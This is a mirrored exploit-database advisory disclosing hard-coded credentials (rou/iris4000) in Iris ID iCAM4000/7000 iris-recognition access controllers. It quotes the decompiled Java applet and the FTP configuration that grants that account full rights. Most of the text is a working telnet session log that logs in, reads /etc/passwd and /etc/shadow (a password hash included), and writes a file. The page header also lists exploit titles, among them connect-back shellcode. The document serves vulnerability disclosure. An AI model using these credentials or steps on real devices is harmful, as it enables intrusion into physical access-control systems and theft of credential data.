bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/linux/remote/40167.txt
Offensive Security 9680c9c2cb DB: 2016-07-27 
6 new exploits

Invision Power Board <= 3.0.4_ <= 3.0.4_ <= 2.3.6 - LFI and SQL Injection
Invision Power Board <= 3.0.4 / <= 3.0.4 / <= 2.3.6 - LFI and SQL Injection

Linux/x86 - connect back (140.115.53.35:9999)_ download a file (cb) and execute shellcode (149 bytes)
Linux/x86 - Connect back (140.115.53.35:9999)_ download a file (cb) and execute shellcode (149 bytes)

Linux/x86 - quick (yet conditional_ eax != 0 and edx == 0) exit shellcode (4 bytes)
Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit shellcode (4 bytes)

Win32 - connectback_ receive_ save and execute shellcode
Win32 - Connectback_ receive_ save and execute shellcode

DVD X Player 5.5 Professional (.plf) Universal Buffer Overflow
DVD X Player 5.5 Professional - (.plf) Universal Buffer Overflow

DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP+ASLR Bypass)
DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP + ASLR Bypass)

ISC BIND <= 8.2.2_IRIX <= 6.5.17_Solaris 7.0 - (NXT Overflow and Denial of Service) Vulnerabilities
ISC BIND <= 8.2.2 / IRIX <= 6.5.17 / Solaris 7.0 - (NXT Overflow and Denial of Service) Vulnerabilities

LedgerSMB1.0/1.1_SQL-Ledger 2.6.x Login Parameter Local File Include And Authentication Bypass Vulnerabilities
LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - Login Parameter Local File Include And Authentication Bypass Vulnerabilities

Lighttpd <= 1.4.15 - Multiple Code Execution_ Denial of Service and Information Disclosure Vulnerabilities
Lighttpd <= 1.4.15 - Multiple Code Execution + Denial of Service + Information Disclosure Vulnerabilities

Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow
Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow Privilege Escalation

Windows TrackPopupMenu Win32k NULL Pointer Dereference
Windows - TrackPopupMenu Win32k NULL Pointer Dereference

ManageEngine OpManager_ Social IT Plus and IT360 - Multiple Vulnerabilities
ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities

Wikipad 1.6.0 - Cross-Site Scripting_ HTML Injection and Information Disclosure Vulnerabilities
Wikipad 1.6.0 - Cross-Site Scripting + HTML Injection + Information Disclosure Vulnerabilities

concrete5 5.5.2.1 Information Disclosure_ SQL Injection and Cross Site Scripting Vulnerabilities
concrete5 5.5.2.1 - Information Disclosure + SQL Injection + Cross Site Scripting Vulnerabilities

RuubikCMS 1.1.x Cross Site Scripting_ Information Disclosure and Directory Traversal Vulnerabilities
RuubikCMS 1.1.x - Cross Site Scripting + Information Disclosure + Directory Traversal Vulnerabilities

Windows Kernel Win32k.sys Privilege Escalation Exploit (MS14-058)
Windows Kernel - Win32k.sys Privilege Escalation Exploit (MS14-058)

Tiki-Wiki CMS Calendar 14.2_ 12.5 LTS_ 9.11 LTS_ and 6.15 - Remote Code Execution
Tiki-Wiki CMS Calendar 14.2 / 12.5 LTS / 9.11 LTS / 6.15 - Remote Code Execution

PHP 7.0.8_ 5.6.23 and 5.5.37 - bzread() Out-of-Bounds Write
PHP 7.0.8 / 5.6.23 / 5.5.37 - bzread() Out-of-Bounds Write
Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post Auth Remote Root Exploit (Metasploit)
PHP File Vault 0.9 - Directory Traversal
Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities
Iris ID IrisAccess ICU 7000-2 - Remote Root Command Execution
Iris ID IrisAccess iCAM4000/iCAM7000 - Hardcoded Credentials Remote Shell Access
2016-07-27 05:06:35 +00:00

205 lines
9.1 KiB
Text
Executable file
Raw Blame History

Iris ID IrisAccess iCAM4000/iCAM7000 Hardcoded Credentials Remote Shell Access
Vendor: Iris ID, Inc.
Product web page: http://www.irisid.com
http://www.irisid.com/productssolutions/irisaccesssystem/irisaccess4000/
http://www.irisid.com/productssolutions/hardwareproducts/icam4000series/
http://www.irisid.com/productssolutions/irisaccesssystem/irisaccess7000/
http://www.irisid.com/productssolutions/hardwareproducts/icam7-series/
Affected version: iCAM4000:
iCAM Software: 3.09.02
iCAM File system: 1.3
CMR Firmware: 5.5 and 3.8
EIF Firmware: 9.5 and 8.0
HID iClass Library: 2.01.05
ImageData Library: 1.153
Command Process: 1.02
iCAM7000:
iCAM Software: 8.01.07
iCAM File system: 1.4.0
EIF Firmware: 1.9
HID iClass Library: 1.00.00
ImageData Library: 01.01.32
EyeSeek Library: 5.00
Countermeasure Library: 3.00
LensFinder Library: 5.00
Tilt Assist Library: 4.00
Summary: The 4th generation IrisAccess™ 7000 series iris recognition solution offered
by Iris ID provides fast, secure, and highly accurate, non-contact identification
by the iris of the eye. The iCAM7000's versatility and flexibility allows for easy
integration with many Wiegand and network based access control, time and attendance,
visitor management and point of sale applications.
The iCAM4000 or 4010 with embedded smart card is the best-selling model in the IrisAccess
4000 range. Simultaneous two-eye capture, face-badging camera, motorized height adjust,
iCAM4000 is easily configured for use in a kiosk as well as in applications where a traditional
wall-mount is used.
Desc: The Iris ID IrisAccess iCAM4000/7000 series suffer from a use of hard-coded credentials.
When visiting the device interface with a browser on port 80, the application loads an applet
JAR file 'ICAMClient.jar' into user's browser which serves additional admin features. In the
JAR file there is an account 'rou' with password 'iris4000' that has read and limited write
privileges on the affected node. An attacker can access the device using these credentials
starting a simple telnet session on port 23 gaining access to sensitive information and/or
FTP access on port 21 (with EVERYTHING allowed) and uploading malicious content.
=====================================================================================
/html/ICAMClient.jar (ICAMClient.java):
---------------------------------------
97: param_host = getParameter("host");
98: param_user = "rou";//getParameter("user");
99: param_pass = "iris4000";//getParameter("pass"); // password
100: param_path = getParameter("path"); // path on the server
/etc/ftpd/ftpd.conf:
--------------------
69: # User list:
70: # Format: user=<login> <passwd> <subdir> <maxlogins> <flags>
71: # <login> user name
72: # <passwd> password or * for anonymous access
73: # <subdir> (internally appended to serverroot)
74: # the user has access to the WHOLE SUBTREE,
75: # if the server has access to it
76: # <maxlogins> maximal logins with this usertype
77: # <flags> D - download
78: # U - upload + making directories
79: # O - overwrite existing files
80: # M - allows multiple logins
81: # E - allows erase operations
82: # A - allows EVERYTHING(!)
101:
103: user=rou iris4000 / 5 A
=====================================================================================
Tested on: GNU/Linux 2.4.19 (armv5tel)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5347
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5347.php
06.05.2016
--
telnet [IP]
iCAM4000 login: rou
Password:
[rou@iCAM4000 rou]# id
uid=500(rou) gid=500(rou) groups=500(rou)
[rou@iCAM4000 rou]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
nobody:x:99:99:Nobody:/:
rou:x:500:500::/home/rou:/bin/bash
[rou@iCAM4000 rou]# cd /web
[rou@iCAM4000 /web]# ls -al
total 0
drwxrwxr-x 1 rou rou 0 Jul 26 07:22 .
drwxr-xr-x 1 root root 0 Jan 1 1970 ..
drwxrwxr-x 1 rou rou 0 Jan 31 2013 cgi-bin
drwxrwxr-x 1 rou rou 0 Jan 31 2013 html
drwxrwxr-x 1 rou rou 0 Jan 31 2013 images
[rou@iCAM4000 /web]# cat /etc/shadow
root:{{REMOVED}}
bin:*:10897:0:99999:7:::
daemon:*:10897:0:99999:7:::
adm:*:10897:0:99999:7:::
lp:*:10897:0:99999:7:::
sync:*:10897:0:99999:7:::
shutdown:*:10897:0:99999:7:::
halt:*:10897:0:99999:7:::
mail:*:10897:0:99999:7:::
news:*:10897:0:99999:7:::
uucp:*:10897:0:99999:7:::
operator:*:10897:0:99999:7:::
games:*:10897:0:99999:7:::
gopher:*:10897:0:99999:7:::
ftp:*:10897:0:99999:7:::
nobody:*:10897:0:99999:7:::
rou:$1$LfhrWa0e$Crfm4qz7MFEaWaA77NFci0:12702:0:99999:7:::
[rou@iCAM4000 /web]# cat /etc/issue
Iris@ID iCAM4000 Linux (experimental)
Kernel 2.4.19-rmk7-pxa1 on an armv5tel
[rou@iCAM4000 /web]# ls -al html/
total 289
drwxrwxr-x 1 rou rou 0 Jan 31 2013 .
drwxrwxr-x 1 rou rou 0 Jul 26 07:22 ..
-rw-rw-r-- 1 rou rou 4035 Jan 31 2013 DHCPSettings_reboot.htm
-rw-rw-r-- 1 rou rou 100614 Jan 10 2008 ICAMClient.jar
-rw-rw-r-- 1 rou rou 6376 Jan 31 2013 WiegandSettings.htm
-rw-rw-r-- 1 rou rou 5643 Jan 31 2013 authentication.htm
-rw-rw-r-- 1 rou rou 6166 Jan 31 2013 changeusername.htm
-rw-rw-r-- 1 rou rou 4816 Jan 31 2013 displayconfigsettings.htm
-rw-rw-r-- 1 rou rou 5643 Jan 31 2013 downloadauthentication.htm
-rw-rw-r-- 1 rou rou 4850 Jan 31 2013 downloadvoice_result.htm
-rw-rw-r-- 1 rou rou 3237 Jan 31 2013 error.htm
-rw-rw-r-- 1 rou rou 3234 Jan 31 2013 error_ip.htm
-rw-rw-r-- 1 rou rou 3248 Jan 31 2013 error_loginfailure.htm
-rw-rw-r-- 1 rou rou 3349 Jan 31 2013 error_usb_ip.htm
-rw-rw-r-- 1 rou rou 6128 Jan 31 2013 ftpupload.htm
-rw-rw-r-- 1 rou rou 5331 Jan 31 2013 iCAMConfig.htm
-rw-rw-r-- 1 rou rou 4890 Jan 31 2013 icamconfig_reboot.htm
-rw-rw-r-- 1 rou rou 5314 Jan 31 2013 index.htm
-rw-rw-r-- 1 rou rou 7290 Jan 31 2013 main.htm
-rw-rw-r-- 1 rou rou 3662 Jan 31 2013 reboot_result.htm
-rw-rw-r-- 1 rou rou 5782 Jan 31 2013 smartcardauthentication.htm
-rw-rw-r-- 1 rou rou 17783 Jan 31 2013 smartcardconfig.htm
-rw-rw-r-- 1 rou rou 4895 Jan 31 2013 smartcardconfig_reboot.htm
-rw-rw-r-- 1 rou rou 5809 Jan 31 2013 smartcardconfig_result.htm
-rw-rw-r-- 1 rou rou 3672 Jan 31 2013 systeminfo.htm
-rw-rw-r-- 1 rou rou 5870 Jan 31 2013 updateicamconfig.htm
-rw-rw-r-- 1 rou rou 4239 Jan 31 2013 updateicamconfig_result.htm
-rw-rw-r-- 1 rou rou 6612 Jan 31 2013 updatenetworksettings.htm
-rw-rw-r-- 1 rou rou 4651 Jan 31 2013 updatenetworksettings_result.htm
-rw-rw-r-- 1 rou rou 5014 Jan 31 2013 updatenetworksettings_state.htm
-rw-rw-r-- 1 rou rou 3985 Jan 31 2013 upload.htm
-rw-rw-r-- 1 rou rou 5645 Jan 31 2013 uploadauthentication.htm
-rw-rw-r-- 1 rou rou 4737 Jan 31 2013 uploadiriscapture_result.htm
-rw-rw-r-- 1 rou rou 6028 Jan 31 2013 voicemessagedownload.htm
-rw-rw-r-- 1 rou rou 6299 Jan 31 2013 voicemessageupdate.htm
-rw-rw-r-- 1 rou rou 5645 Jan 31 2013 wiegandauthentication.htm
-rw-rw-r-- 1 rou rou 4893 Jan 31 2013 wiegandconfig_reboot.htm
[rou@iCAM4000 /web]# echo $SHELL
/bin/bash
[rou@iCAM4000 /web]# echo pwn > test.write
[rou@iCAM4000 /web]# cat test.write
pwn
[rou@iCAM4000 /web]# rm -rf test.write
[rou@iCAM4000 /web]# cd /etc/ftpd
[rou@iCAM4000 ftpd]# pwd
/etc/ftpd
[rou@iCAM4000 ftpd]# cat ftpd.conf |grep user=rou
user=rou iris4000 / 5 A
[rou@iCAM4000 ftpd]# ^D
Connection to host lost.
Reference in a new issue View git blame Copy permalink